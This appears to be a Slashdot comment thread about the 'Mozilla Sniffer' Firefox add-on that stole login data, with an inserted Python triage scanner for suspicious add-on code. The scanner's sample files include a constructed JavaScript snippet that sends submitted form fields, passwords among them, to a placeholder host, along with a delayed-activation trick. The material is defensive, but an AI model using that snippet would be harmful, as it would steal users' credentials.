How the Mozilla Sniffer Backdoor Was Discovered
An anonymous reader writes "Mozilla pulled one of their Firefox add-ons earlier this week for containing a backdoor which stole passwords from its users. Netcraft has taken a closer look at how the rogue extension worked, and how it was discovered by chance rather than through any code review process. Mozilla are working on a new security model to stop this kind of backdoor happening again."
Informative article (Score:4, Informative)
Re:Informative article (Score:1, Informative)
RTFT.
Re:Informative article (Score:5, Informative)
An add-on called “Mozilla Sniffer” was uploaded on June 6th to addons.mozilla.org. It was discovered that this add-on contains code that intercepts login data submitted to any website, and sends this data to a remote location. Upon discovery on July 12th, the add-on was disabled and added to the blocklist, which will prompt the add-on to be uninstalled for all current users.
Re:It was bound to happen eventually.. (Score:5, Informative)
Nothing in that process would detect any but the most blatantly unsubtle malice (and, given that reviews tend to occur fairly quickly, something as simple as recording the date of first run, and not doing anything evil until 1 month has passed would probably count as "subtle" for the purposes of this exercise).
If malice is detected by a third party, or by some after-the-fact spot-check; both Apple and Android have practically identical capabilities to "unpublish and remove" an application from any device that hasn't been divorced from the mothership. For that matter, Mozilla can also issue FF updates that disable add-ons (as they did a while back for that MS
Re:Native features in browser (Score:4, Informative)
>And since Opera is not open source, there is no way to be sure of that.
Sure there is, you can reverse-engineer it to see what it does. You know, just because all you have is the binary doesn't mean you've suddenly entered a magic land where nothing can be understood.
(I'm going to ignore "but can you trust your tools" asshatery)
It was experimental, warnings were there (Score:5, Informative)
Not only that, but the author couldn't even use proper English in the addon description:
Given that, I hate to say that "people had it coming", but I figure people had ample warning that they were trying something that could be malicious.
Re:Native features in browser (Score:3, Informative)
Unless you go through all the code yourself, there's no way to be sure of anything.
You mean unless you go through the code, compile it yourself using a compiler whose code you've also audited and itself was not compiled by an unaudited compiler [bell-labs.com]
Re:Native features in browser (Score:5, Informative)
No, I've seen it. I used to have a pretty decent email pen-pal thing going on with Ken about 10 years ago. He's a pretty cool dude. The point is, yes, even if you see the code, unless you have the code to the compiler and build it yourself, then you can't trust the binary. Basically, you can't trust anything you don't create from scratch. There could also be back-doors in ROM in the hardware. Which is why I go on to say how even if you do your own audit you can't actually trust anything. Either you won't understand everything, you'll have taken in too much information and miss something vital or, as per your example, the real root of the problem will be so obscured from view that it doesn't even matter what you're auditing.
Re:Advertised purpose? (Score:5, Informative)
In addition to modifying several existing files, the author added a file called tamperPost.js that very deliberately sends every form submission to a remote server. You can see some of the code of this on the Netcraft article in the summary (or a direct link to the image [netcraft.com])
When you see the image, you can see that it was obviously a deliberate attempt to steal credentials.
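Two comments in this thread describe what a code reviewer could actually have looked for: the "Advertised purpose?" post above (a file that hooks every form submission and ships it to a fixed remote host) and the earlier "bound to happen" post (a "do nothing evil until a month has passed" time gate that defeats quick reviews). The script below is an added triage example, not Netcraft's or Mozilla's code and not the real add-on's source. It scans the JavaScript files of an unpacked add-on for those traits in combination and ranks files for human review. The regexes are assumptions about what such code usually looks like, the three sample files are constructed for this example (the tamperPost.js contents are invented, not the real file), and collector.example.invalid is a placeholder host.

```python
import re
from dataclasses import dataclass, field

# Heuristic patterns. These are assumptions about what credential-stealing
# add-on code commonly looks like, not signatures of the real "Mozilla Sniffer".
FORM_HOOK = re.compile(r"""addEventListener\(\s*['"]submit['"]|\.onsubmit\s*=|http-on-modify-request""")
NETWORK_SEND = re.compile(r"""XMLHttpRequest|\bfetch\(|\.send\(|sendBeacon\(""")
HARDCODED_URL = re.compile(r"""https?://[^\s'"`)]+""")
CREDENTIAL_FIELD = re.compile(r"""password|passwd|\bpwd\b""", re.I)
# A comparison against the clock, e.g. "Date.now() - firstRun > 30 * 86400000".
TIME_GATE = re.compile(r"""(Date\.now\(\)|new Date\(\)|\.getTime\(\))\s*[-<>]""")


@dataclass
class Finding:
    path: str
    score: int = 0
    reasons: list = field(default_factory=list)
    remote_urls: list = field(default_factory=list)


def triage_source(path, source, allowed_hosts=()):
    """Score one JavaScript file. allowed_hosts are hosts the add-on legitimately
    talks to (taken from its description); any other endpoint counts as foreign."""
    f = Finding(path)
    hooks = FORM_HOOK.search(source) is not None
    sends = NETWORK_SEND.search(source) is not None
    if hooks and sends:
        # The combination is the tell: intercepting submissions AND talking out.
        f.score += 5
        f.reasons.append("form/request hook and network send in the same file")
    elif hooks or sends:
        f.score += 1
    if CREDENTIAL_FIELD.search(source):
        f.score += 2
        f.reasons.append("references credential fields")
    for url in HARDCODED_URL.findall(source):
        host = url.split("/")[2]
        if host not in allowed_hosts:
            f.score += 2
            f.remote_urls.append(url)
    if f.remote_urls:
        f.reasons.append("hard-coded endpoint outside declared hosts")
    if TIME_GATE.search(source):
        f.score += 2
        f.reasons.append("behaviour gated on elapsed time since first run")
    return f


def triage_addon(files, allowed_hosts=(), threshold=6):
    """files maps path -> source text. Return findings at or above threshold,
    highest score first, so a reviewer reads the most suspicious file first."""
    findings = [triage_source(p, s, allowed_hosts) for p, s in files.items()]
    return sorted((x for x in findings if x.score >= threshold), key=lambda x: -x.score)


# Constructed sample sources for this example (not the real add-on's code).
SAMPLE_ADDON = {
    "content/options.js": """
        var prefs = Components.classes["@mozilla.org/preferences-service;1"]
            .getService(Components.interfaces.nsIPrefBranch);
        function save() { prefs.setBoolPref("extensions.sample.enabled", true); }
    """,
    "content/tamperPost.js": """
        window.addEventListener("submit", function (e) {
            var body = serializeFields(e.target, ["text", "password"]);
            var x = new XMLHttpRequest();
            x.open("POST", "http://collector.example.invalid/~drop/post.php", true);
            x.send(body);
        }, true);
    """,
    "content/delayed.js": """
        var first = parseInt(localStorage.firstRun || (localStorage.firstRun = Date.now()));
        if (Date.now() - first > 30 * 86400000) { startCollecting(); }
    """,
}

if __name__ == "__main__":
    for finding in triage_addon(SAMPLE_ADDON):
        print(finding.path, finding.score, finding.reasons, finding.remote_urls)
```

Run against the samples, only tamperPost.js clears the threshold; the time-gated file scores too low on its own, which is the point the "bound to happen" comment makes: a delay trick is cheap to add and hard to spot in isolation, so a review process needs to look for it deliberately (here it is a separate reason string a reviewer can grep for) rather than rely on observed behaviour during a quick test.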
Re:Native features in browser (Score:2, Informative)
Source is ok ... but can you trust your compiler [scienceblogs.com]?
Re:Informative article (Score:3, Informative)
maybe Dillo? (Score:3, Informative)
You could try Dillo [wikipedia.org].
Re:Native features in browser (Score:4, Informative)
Jon: This is great, good work.
Jane: Clean and efficient, great addon.
*Create account: Jack*
Jack: Yeah, awesome stuff! Jim, Jon, and Jane are all correct.
*Create account: James*
James: I love this addon! No viruses here
Re:Native features in browser (Score:4, Informative)
In case you're a beta user: Tree Style Tabs says it's 4.0b1-compatible; TabGroups Manager doesn't but works apart from a cosmetic issue (the tab group bar appears below the tab bar instead of above it).
Re:Native features in browser (Score:3, Informative)
74.220.219.77/~beverlz5 (Score:3, Informative)
jwhois 74.220.219.77
[Querying whois.arin.net]
[whois.arin.net]
OrgName: Bluehost Inc.
OrgID: BLUEH-2
Address: 1958 South 950 East
City: Provo
StateProv: UT
PostalCode: 84606
Country: US
So has law enforcement been notified?